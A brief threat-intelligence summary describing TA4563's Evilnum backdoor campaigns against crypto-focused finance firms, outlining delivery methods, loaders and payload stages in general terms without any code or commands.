TA4563 Uses Evilnum to Target Finance Industry Supporting Crypto

How does Evilnum work?

• As a method of testing the efficacy of the delivery methods, the updated version of Evilnum employs a diverse mix of ISO, Microsoft Word, and Shortcut (LNK) files.
• To avoid detection, the malware includes multiple components that modify infection paths based on detected antivirus software.
• Evilnum can be used for reconnaissance, data theft, and additional payload deployment.

Campaign details

2021 

• The first campaign, which occurred in December 2021, attempted to deliver word documents used to install the updated version of the Evilnum backdoor.
• The phishing messages install several LNK loader components on the domain, which then uses wscript to load the Evilnum payload and a JavaScript payload.

Early 2022 

• This time, the group attempted to deliver multiple OneDrive URLs, each with an ISO or LNK attachment.
• The actor used monetary inducements to persuade the recipients to launch the payload.
• Following campaigns included the direct delivery of a compressed LNK file as an additional attempt to install Evilnum.

Mid 2022

Evilnum details

• Previous versions of Evilnum include both a JavaScript component and a C# component of the backdoor. 
• The backdoor restricts downloads to only one IP address per campaign to ensure that only the target can retrieve the malware.
• .LNK loader is responsible for executing PowerShell via cmd.exe, which then downloads two different payloads from the initial host.

Payload details

• The first payload is responsible for executing two PowerShell scripts.
• The first is used to decrypt a PNG and restart the infection chain. 
• The second, larger PowerShell script loads C# code dynamically and sends screenshots to a C2 server.
• The second payload contains two encrypted blobs in which the first one is decrypted to an executable and the second to a TMP file. 

Conclusion